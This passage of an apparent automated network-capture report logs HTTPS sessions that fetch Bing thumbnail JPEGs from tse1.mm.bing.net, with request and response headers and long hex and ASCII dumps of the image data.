79 3f f9 17 e4 ac 1f 3f ca 87 e4 9b fe ba 55 cb 1b b9 25 87 67 fc b3 af 46 ce cc f1 22 ee ce 86 f9 7f d1 23 82 09 bc cf 33 fd 65 63 5d 69 93 f9 de 64 1f Data Ascii: u*ul9#U1VgK]3ZQ"K<>]_h'[!=YGO'o&w<[74~_G'N&eD?;/ZOiZx?[EsE2X'y??U%gF"#3ec]id

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49722	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:20 UTC	346	OUT	GET /th?id=OADD2.10239340418539_1KFG8UNZE5MUR2Y24&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-07 09:51:21 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 577346 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 9E5A091056CE4D668D2D538458ED3A83 Ref B: EWR311000104019 Ref C: 2024-12-07T09:51:21Z Date: Sat, 07 Dec 2024 09:51:21 GMT Connection: close
2024-12-07 09:51:21 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 32 3a 35 31 3a 31 31 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 22:51:118C
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 8d b5 63 6d 37 6d 30 2b c8 b4 dd b5 6b cb a3 c8 a5 74 3b 15 76 d1 53 f9 54 51 70 b3 3d 86 9f be 99 ba 8d d5 e1 1d cd d8 92 8a 64 6d 49 40 d4 9b 24 a2 a3 a3 75 03 b9 25 15 1e ea 28 10 51 45 37 75 00 39 e8 a2 9b 40 0d a7 51 45 36 ee 24 ac 14 da 75 14 25 70 6a e1 4d a7 53 6a 92 b1 2d 58 28 a6 6f a7 d3 1f 30 6e a3 75 47 45 04 92 51 ba a3 a2 80 24 a8 ea 44 a2 80 23 a2 a4 a8 e8 01 b4 d9 2a 4a 8e b4 88 11 49 4c 7a 9a 9b 5a 26 26 43 b6 9d 52 51 4e e2 0a 29 d4 54 b1 d8 6d 47 22 d4 d4 da 61 62 1d b5 14 8b 56 b6 54 55 69 d8 45 7d b4 dd b5 3c 8b 4d db b2 b4 b8 b7 20 92 3a 36 d4 9b 69 bb 76 53 25 a4 c8 b6 53 3c ba b1 4d db 4e e3 21 da 29 b1 c5 56 36 d1 b6 8b 81 0f 91 4b 1c 55 3e da 36 d4 dd 94 45 b2 99 b6 ac 51 45 c0 af b6 8d b5 36 da 36 d1 70 2b c9 45 4b b2 8d 94 c0 Data Ascii: cm7m0+kt;vSTQp=dmI@$u%(QE7u9@QE6$u%pjMSj-X(o0nuGEQ$D#*JILzZ&&CRQN)TmG"abVTUiE}<M :6ivS%S<MN!)V6KU>6EQE66p+EK
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 4d b6 74 91 c7 68 f7 72 24 90 da 47 3c 7f eb 24 8b fb ff 00 dd ab 5e 7e 93 6f 34 97 5a a4 df 67 82 38 bf e5 95 52 8e 7b 4d 13 c3 d2 69 70 69 b3 49 24 72 79 9e 64 9f 7f fe 05 5c f7 88 e5 b7 48 a3 91 21 bb 92 79 3f 79 25 b7 df a5 4e 5c f6 7d 09 ba b3 d0 ea ec 6e 75 28 be cd f6 5f f4 78 e4 fd e5 cf fb 95 bd 05 9c f7 73 47 75 35 9f fc 7b ef 92 db f8 13 fd a6 ae 2b 4a d4 2f ee ae ed 92 7d 37 50 f2 ff 00 e5 a7 9b 56 af b5 79 3f 77 3b de 79 91 db c9 fb bb 69 6a 2b cb 91 ee 28 f2 da e3 7c 41 a5 41 aa f8 b3 66 a3 79 0e 95 6b f3 c9 1c 91 7d c8 de b8 5f 11 d9 c7 65 77 1b bc d3 5c 47 27 fa c8 eb 4b 5c f1 56 cd 43 ec a9 0f da 3f e5 a5 cf 95 58 7e 7c 1a 85 de f9 26 9a de 3f f9 67 1c bf f2 ce bb f0 55 66 d6 a7 25 4b 37 72 68 f4 ab e8 ae ff 00 7f 67 e5 da c9 fb cf f8 05 Data Ascii: Mthr$G<$^~o4Zg8R{MipiI$ryd\H!y?y%N\}nu(_xsGu5{+J/}7PVy?w;yij+(\|AAfyk}_ew\G'K\VC?X~\|&?gUf%K7rhg
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: d1 c1 e6 3c 92 79 5f df ac d8 27 be 7f 32 7f 27 cc fd ef ef 3c da da 3c ed 11 24 af 64 45 7d 63 3c 57 7b ee a6 fd fc 72 ff 00 a4 ff 00 d3 44 ad 79 d6 c2 d2 d3 f7 1a 6c d1 bc 9f bc b6 8e 5f 9f cb ae 83 e1 ae 83 e1 79 a1 be f1 cf 8f ff 00 b4 24 d3 b4 ef dd db 69 36 3f eb ae e5 fe f3 ff 00 b0 2b bc f0 fb 78 22 df ed 3e 25 fb 1c df 6a 92 3f f4 28 fc dd e9 1e ef e1 ae 5c 4e 29 53 8d 97 42 e9 d1 72 3c 66 7b c9 25 9b 7b f9 31 c7 e5 ff 00 cb 58 bf 8e ab c7 6b 1d de a3 24 e9 ff 00 2c ff 00 e7 97 fc b4 af 62 f1 76 87 e1 3b 7f 13 5b 5a f9 3f da 37 5a 8c 49 24 9f 66 ff 00 53 1f f7 96 9d e0 bd 7f e1 b6 99 e3 2f ec ed 2f 4d ff 00 8f 29 3f 79 25 f7 f7 ff 00 fa d4 e9 d7 e6 8b 71 42 95 25 17 ef 1e 2c f6 9a 97 da fe 78 66 8e 38 ff 00 d5 f9 b1 55 ff 00 0c 68 77 7a d6 b9 fd Data Ascii: <y_'2'<<$dE}c<W{rDyl_y$i6?+x">%j?(\N)SBr<f{%{1Xk$,bv;[Z?7ZI$fS//M)?y%qB%,xf8Uhwz
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 5c c9 26 28 ab b3 e9 dd 4b c1 9a 6e 95 fd 92 ef a6 c5 a7 78 7f ec c9 e5 de c5 2e ff 00 b4 4a c9 fc 35 4f 5c f1 ef 82 3c 29 0d b3 ff 00 66 dd ea 37 51 ff 00 cb b4 b2 ec 4f f7 ab b2 f8 a9 e1 0d 35 21 f0 bf 86 f5 7d 7a 68 ef b4 ab 27 b8 92 38 be 74 93 cb ff 00 76 bc 1f c4 7e 07 d6 b5 3d 27 fe 13 27 bc d3 e4 82 f6 e5 ff 00 d1 bc df df 46 9f de af 25 43 da 3d 4e c9 49 45 6c 6a 47 e3 4f 00 f8 c3 56 b9 d5 3c 43 a0 cd 65 7d 1f fc bb 45 2b bc 32 25 6f 6b 90 78 33 4f f0 9d 8e a9 65 a9 4d f6 59 2d be d1 6d 65 2f c9 5e 47 1c 1f d9 fa 87 9e 9f eb fc bf f5 55 a9 25 9e ad e3 08 7c fd 2e 19 ae 35 29 22 4b 7b 6b 6f f9 63 1d 6d 25 08 75 d0 57 6c d1 b1 d4 e3 d4 e5 b1 b5 ff 00 57 6b fe b2 e6 da 2f 9f e4 ae ab c5 d7 9e 17 d7 7e c3 a8 4f 0c df bb fd e7 ee fe e4 08 b5 85 e2 3d Data Ascii: \&(Knx.J5O\<)f7QO5!}zh'8tv~=''F%C=NIEljGOV<Ce}E+2%okx3OeMY-me/^GU%\|.5)"K{kocm%uWlWk/~O=
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 3c bf f9 67 57 64 5b 4f e3 b3 87 f7 95 97 a6 b4 7a 66 9f e7 cf 37 ef e4 ae 73 5c d6 af ee ff 00 d6 4d e5 c7 5c 8a 8c aa 54 6d 3d 08 bb 7d 4e c7 ed 3a 6b f9 89 fb 98 fe cf fe b2 a3 93 50 b0 fb 24 8f 0f 93 24 91 ff 00 cb 3a e3 7c f8 e5 87 fc fe f2 9f 24 b2 45 37 98 95 a7 d5 5f f3 30 89 66 4d 5e 44 9a 49 e3 ff 00 59 51 7d b2 47 9b 7d 45 3b 41 17 ce 90 d4 56 fe 65 dc df 27 ee eb a6 30 5c b7 2b 52 c5 d5 cc f0 c3 e7 d5 2f 3e 77 87 cf 48 7f 77 25 5d 92 34 79 be 79 bf d5 c7 4c fb 4f d9 fe 44 ff 00 96 75 71 4a db 01 42 3b ab 85 f9 3f e7 9d 6a 69 77 32 24 db ee bf d5 ff 00 ac a8 ac 5a 3b 89 b7 cf 0f ef 24 ad 9d 3b ec 97 13 6f d4 7f 77 04 71 79 7f ba a7 5a a2 84 5b b6 c6 94 a0 e7 35 15 d4 b5 f0 83 5a d7 75 3d 5b fe 2a 5d 06 1f 22 49 3f d0 a4 97 fb 95 9d 63 e3 a8 25 Data Ascii: <gWd[Ozf7s\M\Tm=}N:kP$$:\|$E7_0fM^DIYQ}G}E;AVe'0\+R/>wHw%]4yyLODuqJB;?jiw2$Z;$;owqyZ[5Zu=[*]"I?c%
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: bb 65 83 c3 d2 9a a7 52 51 53 6f 44 87 77 25 a2 28 68 fa e4 91 43 be f7 4d f3 20 f3 3c b9 2e 7f 83 cd ae bf 52 f3 f4 4f 01 c9 e2 8b ab cf b3 47 71 73 f6 78 ff 00 bf 71 55 7c 23 e0 27 bd f8 7b 26 af e2 fd 4b fb 2a d6 4f dd e9 b6 51 7f cb c7 fb 72 57 51 76 da 16 b7 e0 3f 3e 0b 39 a4 b1 d3 ad be c9 65 6d 2f fc b3 7f f9 eb 5e 36 37 15 41 55 8c 22 96 8f 5f 42 e9 d3 d3 53 8d 8f c5 f6 fa 7d dc 68 93 79 93 c9 fb cf dd 7f cb ba 7f b5 5d 6e 97 ab c7 2f 84 ff 00 e1 21 7f f8 f1 92 e7 ec f1 dc cb f2 79 8f fe cd 70 7e 0e f0 2c 77 ba b5 f7 da b5 2f ec e8 34 ed 92 6a df df 92 2f fe bd 5c f8 c5 e2 db f7 d4 2d b6 69 b0 c9 e0 eb 78 d2 de da da 3f fd 0b 6d 75 cb 13 2a 95 d5 0a 12 76 b6 af a5 bb 19 aa 70 4b 53 53 c4 7a e2 79 d2 7d aa f3 cc 92 3f dd f9 71 7f 7e ba 8f 03 dc da Data Ascii: eRQSoDw%(hCM <.ROGqsxqU\|#'{&KOQrWQv?>9em/^67AU"_BS}hy]n/!yp~,w/4j/\-ix?muvpKSSzy}?q~
2024-12-07 09:51:21 UTC	16069	IN	Data Raw: 05 bc 7e 64 9e 57 df ff 00 80 d3 74 a8 9d 21 fd c7 d9 23 fb 6f fc 7b 79 bf 3c d5 6a de 78 df c4 31 e9 df b9 bd ba 8e 3f b3 c7 6d 17 fc b4 6a ca 55 e6 d9 71 82 6c e4 bc 77 79 25 d4 31 d9 68 3a 0d dd be 9b 24 9e 5c 52 4b 16 f9 a4 db 59 b2 45 a9 45 e5 cf 75 0c 36 5f 68 fd dc 7f ba fe 1a f6 9f 1f db 78 a3 e1 fc df 62 f1 2e 9b 69 65 24 76 df e8 52 45 2a 3a 6e 93 ff 00 66 ab 1e 38 be d0 b4 7f 86 fa 27 86 bf d1 2e 35 5b 88 ff 00 d3 75 6f f9 6d f3 7f 0d 5f d7 1d 3b 2b 0d 51 d6 ec f0 49 35 0b 0b 8d 72 2d 3b 54 9a 6f ec a8 ff 00 d6 7f 66 c5 be 69 2b ea cf 80 be 07 fd 9a a5 f0 fc 5e 25 f1 27 f6 b4 97 5f 66 49 0d b6 b9 2b fe ef fe 03 5c 95 c6 af f0 eb e1 fe 93 a6 f8 7b c3 da 0d a5 c4 92 46 9f 6d d5 a5 f9 e6 f9 be f6 da d0 b5 b9 f8 56 93 5f 5d 69 fa 97 d9 e4 b7 8f cc Data Ascii: ~dWt!#o{y<jx1?mjUqlwy%1h:$\RKYEEu6_hxb.ie$vRE*:nf8'.5[uom_;+QI5r-;Tofi+^%'_fI+\{FmV_]i
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: ca fe 0a ea bc 3f 6d 69 17 99 fd 97 67 f6 7f 33 fd 67 f7 2b 9e 85 17 4d 3b 6c 2a 92 72 b5 cd 2d 4a ce 3b b9 a3 ff 00 9e 91 d3 60 b1 b1 8a ee 37 79 bc ba 92 3f 33 c9 f9 e1 f9 2b 1e e9 bc df f9 6d fb c8 eb aa 09 c9 72 de c6 3c c6 b6 9b 15 a4 53 5f 4f e4 fe ee 4f dd c7 fd fa cd db 3f ef 13 ce fd dc 75 1c 97 90 3c 3b 1f f7 6f 55 64 69 1e 6f dc 4d ff 00 6c eb 58 53 69 b0 e6 19 1c 92 45 36 c9 ff 00 d5 ff 00 cb 3a e8 7e 04 6a 11 de c3 a9 68 30 78 aa 6b 7d 62 3b 9f f8 f6 b9 fb 9f ef 47 59 f6 36 33 ea 7e 67 9f 0c 3e 64 75 af f0 67 4c f0 46 a7 e2 1d 4b 57 ba fd de ab 27 fa 24 97 3f c7 27 fd 73 ae 2c d9 c1 d1 51 eb 73 d4 ca a4 fd ab b7 63 88 d7 34 f9 d3 5c d5 92 f6 1d 43 ed 56 57 3f 68 fb 6f fc b1 b8 75 fe fd 1f 15 2e a3 8b c4 1e 09 7d 42 6f ed a9 ff 00 e3 ee f7 f7 Data Ascii: ?mig3g+M;l*r-J;`7y?3+mr<S_OO?u<;oUdioMlXSiE6:~jh0xk}b;GY63~g>dugLFKW'$?'s,Qsc4\CVW?hou.}Bo
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: bb c9 05 18 ae 63 b8 83 c4 30 5d 68 72 6a fa 5f 93 a0 da c9 72 f1 db 5c dc c5 fe b3 6f de f2 ab cc 7c 45 a9 f8 93 c5 be 20 96 cb c2 f0 ea d7 1a 3f fc 7d ea d7 32 cb f3 df c4 bf dd ae b7 55 bc d3 7c 4b fd 9a fe 39 9b cc d2 a4 91 e0 d3 6c ad a2 f2 7f ed af cb fc 35 8d f0 f2 fb cd d4 2f a7 d2 3c ed 2b 43 d3 a3 7b 7b 2b 98 a5 ff 00 59 ff 00 4c 12 bc 38 46 30 5c f3 57 7f d6 a6 d3 8a b1 c0 eb 9a af 81 2d 3c 33 26 a3 e1 ef 0a ea 1a 74 f6 d7 3f bc f3 7e 7b 6d 94 68 fa f7 d9 fc 27 e4 3c df 6d d5 75 a9 3f d2 64 ff 00 9f 7b 5a c5 f1 74 b1 ea 7e 2c be b5 d4 7c ed 06 d6 e3 64 71 e9 b1 4b f2 48 df df 6a ce d1 f4 5b 0f 26 e7 4b 9f 5e fb 16 b1 1c a9 1c 91 ff 00 04 89 5e d5 36 95 35 29 3d 59 3e d1 5e c8 ea e4 d0 ef b5 bd 0e e7 57 d3 a1 86 df 4a d1 7f 77 1f 9b fe ba e3 fd Data Ascii: c0]hrj_r\o\|E ?}2U\|K9l5/<+C{{+YL8F0\W-<3&t?~{mh'<mu?d{Zt~,\|dqKHj[&K^^65)=Y>^WJw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49721	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:20 UTC	346	OUT	GET /th?id=OADD2.10239381714324_1EWZXOYRPJQHWBKEX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-07 09:51:21 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 644477 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 270DB45D9E3E43FFA7F8A2A13985B00A Ref B: EWR311000106009 Ref C: 2024-12-07T09:51:21Z Date: Sat, 07 Dec 2024 09:51:20 GMT Connection: close
2024-12-07 09:51:21 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a 22 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 31 32 3a 30 34 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``"ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:12:048
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: e5 62 59 38 fd 46 6a 4b 8f 04 5b 68 96 b1 ff 00 63 69 9e 63 46 c7 f7 6d 26 de bd cf f7 ab ae 9d 49 72 da 5b 1c 55 68 45 49 4a 27 11 ac 21 bb b8 9e ca 58 ae 65 f9 56 65 82 36 3e 5e 01 c6 d1 db 71 eb 8a e9 3e 1a cd 61 a4 7d ab 4f 97 50 fb 35 b4 f2 c7 24 76 9e 66 d6 62 0f 52 3a fe 14 fb 6d 2a fd ed 7e d3 e2 1b 6b 28 9a 3b b5 48 96 0c ef 93 70 38 cf b0 aa 50 f8 62 db 53 f1 04 f7 77 0d 3d 9c 4d f2 44 bf 75 a3 74 e0 9e 72 30 6b 2c 44 a1 4d 7b 49 3d 8c 65 76 d5 96 a7 b6 c3 20 31 ab fd ed d5 67 60 f9 4f 6d bf c5 5c 3f 84 75 31 65 aa 5c e9 17 77 2d 23 44 c0 af 98 df 74 11 d0 7e 15 da 2d ca 4a aa 77 2e 36 fc d5 34 eb c2 a2 e6 8b d0 da 2d 3d 8b 88 10 43 c2 ab 1f ef 52 bc 9e 5f c9 1f fc b4 5c ee db f7 6a b2 cf b3 76 f5 55 1b 7e 5f 9b e6 cd 4b 1d fc 17 0b 1f 97 2e e1 Data Ascii: bY8FjK[hcicFm&Ir[UhEIJ'!XeVe6>^q>a}OP5$vfbR:m*~k(;Hp8PbSw=MDutr0k,DM{I=ev 1g`Om\?u1e\w-#Dt~-Jw.64-=CR_\jvU~_K.
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 3b 46 9b a3 42 3e ee ee b8 ef ed 5e 7f a5 6b 7a cf 85 fc 41 7d 2c f0 5b 5c 45 b8 bc 5e 6b 06 93 19 1d 3d 73 ff 00 b2 d7 7b 67 e3 e8 9f 4f 67 bb 8a 39 24 65 1e 5a ee 1b 72 47 dd f7 1f 85 7b 99 16 23 0f 4f dc 51 d5 ff 00 5d 4f 23 1f 85 ab 52 1c ce c9 18 3e 21 d3 fc eb 7f b6 d9 b2 dd 4a b1 b1 68 23 62 aa df de 24 9e 38 f4 18 c9 ac ed 7b 57 b0 d2 ac 6d ad 6c 16 39 2e 26 88 3c f0 34 a3 ce 5c f1 bb 3d 39 e9 8a dd d4 b5 ed 2e f6 19 0f d9 be ca 2c e0 92 4b d8 e0 90 2c 6d 8e 81 40 ee 47 e2 2b c3 7e 26 26 8d 73 f6 9b bd 3a 76 d2 2e a4 89 a4 92 59 27 f9 64 02 3d ea ac 07 1b 89 e3 23 bd 7b b5 72 ac 0e 26 9c b9 e9 ab bf 96 bf 23 c7 94 f1 34 a5 1e 49 b7 67 df f0 3d 42 c3 e2 96 84 f2 5b 41 22 c1 2c ad 03 0f ef 32 95 c8 03 6f 1d 7d 6b 92 d5 7e 23 6a 9f e9 31 41 2a fd 9d Data Ascii: ;FB>^kzA},[\E^k=s{gOg9$eZrG{#OQ]O#R>!Jh#b$8{Wml9.&<4\=9.,K,m@G+~&&s:v.Y'd=#{r&#4Ig=B[A",2o}k~#j1A*
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 8f b1 aa 13 5b a5 d7 9f 14 57 3c ae 03 2e ef bc 6b 39 c5 b7 72 92 4f d4 aa b6 02 75 53 72 ac b2 b3 67 6c 72 15 dc 7d 4e 2a 2b 3b 9b 08 6e 22 8e 39 65 f3 24 cf de f9 ba 71 cf f4 a2 4b d2 6e 1a ce de 58 db e5 f9 76 fc dc 7f 4a e6 d3 c5 b0 58 47 73 11 b3 b9 92 e2 09 58 34 51 c6 14 aa 6f c0 ce 7f c9 a9 a9 59 52 4a 4f 62 55 37 27 64 75 1a d5 bc 4d 6e a5 ed 7c f1 1c a1 d7 cb fb ca 7d 45 2a dd 96 5d 86 35 53 1b 0d bb 9b f9 56 5e 9f e2 47 bd b5 69 4d 8c f1 af 97 98 e4 97 e5 59 3f c3 15 e6 3e 38 83 e2 24 3e 36 6d 63 44 66 9f 49 b9 da 56 28 f0 dd 07 3d f8 cd 15 2a 4f 47 05 72 54 54 77 3d 82 fa 4b c7 5f f4 68 be 56 fb d2 6e f9 57 fc 69 b6 d7 b1 96 c1 da b2 2b 6c 91 57 f8 4f 6a e6 fc 3d 73 a9 de c7 15 c5 ce e8 0c 8a 3c c8 a6 5f 97 f0 c7 ad 41 e2 db fb 9d 3e fb 4f 8e Data Ascii: [W<.k9rOuSrglr}N+;n"9e$qKnXvJXGsX4QoYRJObU7'duMn\|}E]5SV^GiMY?>8$>6mcDfIV(=*OGrTTw=K_hVnWi+lWOj=s<_A>O
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 95 36 1a 6f 97 2d cc f7 3e 5e 51 24 e1 4b 0e a0 e0 71 bb de b6 a3 98 ac 6a e1 b7 6e e7 6c 9f c4 2b 84 b0 d7 ed e5 b5 63 2d ce d6 8d 71 bb f8 57 d3 a7 7f 7a da d3 ee ad 12 fa 3b 87 6f b4 dd 79 60 47 23 7f 08 1e 9f 5f 4a 4e 2a e5 f3 3b ab 1d 55 85 f9 97 50 96 08 e2 9d 63 55 07 f7 8a 17 77 fb be d5 a1 67 3d db 59 ac 92 a6 d9 57 ef 79 7f 77 f0 cf b5 63 58 4b 89 b2 65 59 37 70 aa ab eb da b6 2d c8 da c9 1f f1 60 7d ea 4e c2 f7 8b f6 e5 25 da e6 5d a5 b3 4e 92 f1 06 d8 e3 dd f7 88 dd b8 75 e9 cd 41 0b 22 b3 09 e5 5d aa bf f0 1c 8a 7d 9d ad bf 9d e6 a2 fc cd 93 23 33 7a f7 c5 08 99 48 a7 23 cb 15 c4 82 56 dc ac df 2f e3 da 99 aa 5d ce 96 b2 9b 44 f3 64 8d 49 f2 ff 00 bd ed f5 ad 0b c8 63 dc ce fb 70 b8 3f 2a f7 aa cf e5 47 26 3e 56 91 94 ee 55 ff 00 1a ad cc 5b Data Ascii: 6o->^Q$Kqjnl+c-qWz;oy`G#_JN;UPcUwg=YWywcXKeY7p-`}N%]NuA"]}#3zH#V/]DdIcp?G&>VU[
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: c7 04 57 d1 d2 54 a5 07 34 b5 3c 49 7b 48 d5 51 7b 1e d7 1c 70 2c 8a eb 2b 48 dd 16 ad 33 be ed 87 a2 af ca db be 6c 9a c5 8e fe 29 2d e2 bd 8a 25 68 e4 8e 39 63 91 be f6 c6 19 38 fa 54 f1 cc b7 17 0d 1b ac 92 24 6b bd 59 54 ed e7 a7 22 b9 39 92 76 3b 1d 3b ab b2 e5 bc 33 99 18 49 2f fa b6 c7 fb 5f 9d 49 31 96 38 d9 12 2d df ed 6d ed ed 4d 69 cb 2f 9b 3f ca 1b ee ee 5d bf 81 cd 3a 69 92 6f 90 7f ab db fc 3f c5 5a 27 a1 8c a2 41 34 e9 71 6f 1b 89 5b d5 95 7e 5f c0 d4 12 31 68 77 ee 55 6f ef 37 e5 8a 65 bd 84 76 ac c6 db e4 86 59 0b ed 6f bc a4 9e d4 ed ae cb c6 d6 da d5 69 e8 67 63 3a 28 ae 0d c3 09 76 ac 7c ee 55 6f 95 87 af ad 45 34 76 db 64 79 56 39 0f 98 7c a6 6e ab c7 a9 fa 55 eb f0 55 54 16 5c ee 02 a9 48 b1 49 67 22 05 dc ca c4 aa ed 3d 7d b3 45 92 Data Ascii: WT4<I{HQ{p,+H3l)-%h9c8T$kYT"9v;;3I/_I18-mMi/?]:io?Z'A4qo[~_1hwUo7evYoigc:(v\|UoE4vdyV9\|nUUT\HIg"=}E
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: b7 b6 2b d5 bc 31 e1 d3 aa da c5 77 7b 12 b4 9e 5e 57 72 ed db eb 8f 7a df 0f 59 ca 92 93 5a 1c f4 68 c6 4f dd 39 ad 2b c3 96 56 1a 2c 86 05 65 0b c7 fa c1 f3 1e fd 6b 03 e2 56 a9 3e 9f 0c 02 d3 cc 53 2c 4a b7 72 47 f7 b2 38 c0 fa f7 af 68 b8 f0 8d 9b 79 72 18 9a 32 bf eb 19 9b e5 c7 af d6 b9 2f 19 7c 38 8e fa 1b e4 b3 96 36 92 58 97 c8 f3 32 de 5f cd 97 23 fd e0 31 5e 56 3b 0b ed ea c2 a5 be 17 f9 e8 77 4f 08 a5 4b 96 fa 9e 4d e1 8f 15 5c 5e 6a 8b 61 7b 3c f1 f9 6c 53 6a fd e6 f4 38 3c 57 a8 e9 7e 2c 3a 7a c4 97 76 8c b6 cb 1b 09 24 89 77 79 7d f9 f5 ce 6a 96 83 f0 f6 cb 47 be 94 4f 62 bf 6c 8a 30 92 2e e1 22 6f 1d 86 7e b4 93 78 6f 5c 5d 4a 4b 4b 78 3c fb 1f 30 cd 23 6e dc f9 70 3e 5d dc 0f fe b5 7a 54 e2 f9 6c 45 0a 3e c2 37 bd ee 5b b5 f0 67 87 bc 53 Data Ascii: +1w{^WrzYZhO9+V,ekV>S,JrG8hyr2/\|86X2_#1^V;wOKM\^ja{<lSj8<W~,:zv$wy}jGObl0."o~xo\]JKKx<0#np>]zTlE>7[gS
2024-12-07 09:51:21 UTC	16069	IN	Data Raw: b9 c6 36 7c a8 e0 a7 cd bc 8f 46 92 e2 38 db 0e dc 6d cb 7e 35 73 4f 92 d0 d8 e6 db e6 f3 33 f3 57 93 f8 8b 4b d7 6c bc 41 2f 88 ce b5 27 f6 5f ca 1e c9 b2 db 9c 9e dd b6 e0 56 a5 bf 8f ec 34 6d 2e d8 6b 2d e5 49 7c cc 60 f2 94 b2 c8 57 03 6f ae ee 7a 62 b9 a9 73 29 25 24 15 5a d5 26 7a 96 8b ab db c9 62 a6 26 93 e5 e3 fd ac d5 94 d5 ed 24 d4 20 d2 ee d5 a4 96 eb 3e 5e e6 0a 98 c1 2d c7 5e 05 71 f6 17 c2 19 24 91 11 64 32 ae 76 ee da aa 6a 4b ab 9b 8b 6d 3e 4d 50 db 79 f7 93 c4 61 8a 5f e0 b7 43 f7 b6 8e b5 d1 88 e7 56 71 66 38 58 c2 4e d2 0b 83 65 6f 24 f1 d9 ca de 5c 8c 7f 7b 22 fc cc 33 eb 5e 63 e3 2f 03 c8 75 4b 9d 43 c3 76 71 